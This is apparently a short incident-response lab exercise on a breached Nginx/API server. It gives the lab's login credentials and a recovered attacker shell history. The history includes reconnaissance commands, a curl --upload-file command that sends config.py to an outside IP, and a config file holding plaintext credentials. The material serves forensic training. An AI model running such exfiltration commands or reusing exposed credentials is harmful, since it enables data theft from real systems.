IR LAB
Objective: Analyze the access logs of a compromised Nginx web server. Can you correctly identify the method of enumeration and initial exploitation by the attacker?
"This is our third breach for this year: we see strange web requests in Nginx logs, then some unexpected changes in system files, and after a few days, we see our data in Telegram! We tried cleaning infected files, but hackers are always one step forward.”
“Yesterday, we observed a similar web scan on our newly deployed API server, and suspect it might be the same threat actors. We quickly isolated the server from the network and desperately hope for your help!”
<aside> 💡 Creds
10.10.187.98
dev
d3v-p455w0rd
</aside>Key Findings:
id
id
uname -a
ls -la /etc
ls -la
cd apiservice/
ls
cat main.py
cd src/
ls
cat api.py
cat config.py
curl --upload-file config.py <http://5.230.66.147/me7d6bd4beh4ura8/upload>
exit
sudo su
clear
dev@prod-web-003:~/apiservice/src$ cat config.py
class config:
API_HOST = "0.0.0.0"
API_PORT = 8081
# TODO: Implement some authentication
# API_USER = "dev"
# API_PASS = "d3v-p455w0rd"